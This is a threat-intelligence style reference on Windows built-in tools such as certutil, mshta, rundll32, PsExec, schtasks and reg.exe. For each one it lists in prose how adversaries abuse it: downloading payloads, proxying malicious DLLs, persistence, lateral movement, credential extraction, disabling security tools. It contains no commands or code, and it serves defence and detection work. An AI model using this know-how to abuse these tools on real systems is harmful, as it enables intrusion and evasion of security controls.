Certutil is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services.

An adversary may use [certutil] to:
| Download files from a given URL | Base64 encode collected data | Decode binaries hidden inside certificate files as Base64 information | Install browser root certificates as a precursor to performing Adversary-in-the-Middle |

BITSAdmin is a command line tool used to create and manage BITS Jobs.

An adversary may use [BITSAdmin] to:
| Create BITS Jobs to launch a malicious process | Create BITS Jobs to upload files from a compromised host | Create BITS Jobs to upload and/or download files | Create BITS Jobs to upload and/or download files from SMB file servers |

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility.

An adversary may use [Mshta] to:
| Execute malicious payloads | Execute a malicious hta file | Executed malicious JavaScript code | Execute HTML pages | Execute malicious VBScript | Execute DLLs | Download and execute applications from a remote server |

Adversaries may abuse Rundll32.exe to proxy execution of malicious code.

An adversary may use [Rundll32] to:
| Execute binaries, scripts, and Control Panel Item files and to execute code via proxy to avoid triggering security tools | Establish persistence within Registry Run Keys / Startup Folder entries to execute malicious DLLs | Execute an initial infection process and launch a malicious DLL | Load a malicious DLL | Execute the Cobalt Strike Beacon loader DLL | Execute commands and scripts |

Adversaries may abuse PsExec.exe to move laterally between computers on the company's network and install their malicious tools on multiple assets.

An adversary may use [PsExec] to:
| Remotely create accounts on target systems | Leverage Windows services to escalate privileges from administrator to SYSTEM | Download or upload a file over a network share | Writes programs to the ADMIN$ network share to execute commands on remote systems | Execute binaries on remote systems using a temporary Windows service

Adversaries may abuse the Windows Task Scheduler (schtasks.exe) to perform task scheduling for initial or recurring execution of malicious code.

An adversary may use [Schtasks] to:
| Achieved persistence via scheduled tasks | Created a scheduled SYSTEM task that runs when a user logs in | Run programs at system startup | Run malicious scripts on a compromised host (.vbe, .dat) | Downloaded additional malware including Cobalt Strike, PowerShell loader| Execute malware during lateral movement | Bypass UAC | Maintain RDP backdoors

Adversaries may abuse (Regsvr32.exe) to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems.

An adversary may use [Regsvr32] to:
| Bypass application control techniques | Execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory | Execute malicious scripts | Load malicious DLLs| Execute malicious DLLs | Execute malicious payloads | Run a remote scriptlet that drops a file and executes it | Ensure persistence at system boot | Run a .sct file for execution

Reg.exe is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. Utilities such as Reg.exe are known to be used by persistent threats.

An adversary may use [reg.exe] to:
| Interact with and modify the Windows Registry of a local or remote system | Gather details from the Windows Registry of a local or remote system | Find/Extract credentials from the Registry | Check for installed software on the system | Retrieve proxy information in the Registry | Remove/Deactivate security settings eg.(AV/EDR/FW/UAC) |